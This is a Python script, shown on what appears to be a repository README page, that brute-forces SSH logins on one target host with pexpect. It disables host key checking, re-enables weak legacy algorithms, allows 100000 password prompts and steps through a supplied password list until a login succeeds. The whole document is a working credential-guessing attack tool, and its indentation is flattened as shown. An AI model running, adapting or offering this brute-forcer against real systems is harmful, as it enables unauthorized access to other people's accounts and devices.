README.md
Rendering markdown...
import sys
try:
import pexpect
except:
print("Please install pexpect: pip install pexpect")
exit()
import time
sshcmd = ("ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null "
"-o KexAlgorithms=+diffie-hellman-group1-sha1 -o HostKeyAlgorithms=+ssh-dss"
" -o PubkeyAcceptedKeyTypes=+ssh-dss -o NumberOfPasswordPrompts=100000 "
"[email protected]")
# "[email protected] -p 2222")
def tryPasses(passes):
if len(passes)==0:return 0,False
child = pexpect.spawn(sshcmd,encoding="utf-8")
# child.logfile=sys.stdout
for i,e in enumerate(passes):
child.expect('password:')
child.sendline(e.strip())
index=child.expect([
r"closed\.",
"again.",
pexpect.EOF,
"(password).",
"port 22"])
if index==0:
print("Found: ",e)
return i,True
if index==1:continue
if index in [2,3,4]:return i,False
# The previous line looks wrong, but if the last password attempt is correct,
# the server still lets the user in (then kicks out)
return i,False
idx=0
passes=[]
if "--help" in sys.argv:
print(f"""Usage: {sys.argv[0]} [path-to-passwordlist]
If password list is not given, uses the numbers from 0 to 99.""")
exit(0)
if len(sys.argv)==1:
print("No password list given, using integers from 0 to 99")
for i in range(100):
passes.append(str(i))
else:
print("Loading password list...")
with open(sys.argv[1]) as f:
passes=f.readlines()
rpasses=passes[idx:]
print("Trying passwords...")
while idx < len(passes):
rpasses=passes[idx:]
res=-1,False
try:
res=tryPasses(rpasses)
except KeyboardInterrupt:
exit(0)
except Exception as e:
res=-1,False
print("""WARNING: An attempt failed.
If running 3 or more processes this is normal. Waiting 1 second. Error:""",e)
time.sleep(1)
# print("currently on:",idx)
#print(res)
if res[1]:
exit(0)
break
else:
idx+=res[0]+1
print("Password not in list")
exit(1)